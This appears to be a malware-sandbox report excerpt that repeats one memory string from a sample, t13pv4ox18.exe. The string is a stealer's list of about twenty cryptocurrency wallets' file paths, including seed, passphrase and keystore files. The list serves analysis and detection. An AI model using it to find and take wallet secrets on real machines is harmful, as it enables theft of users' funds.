Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
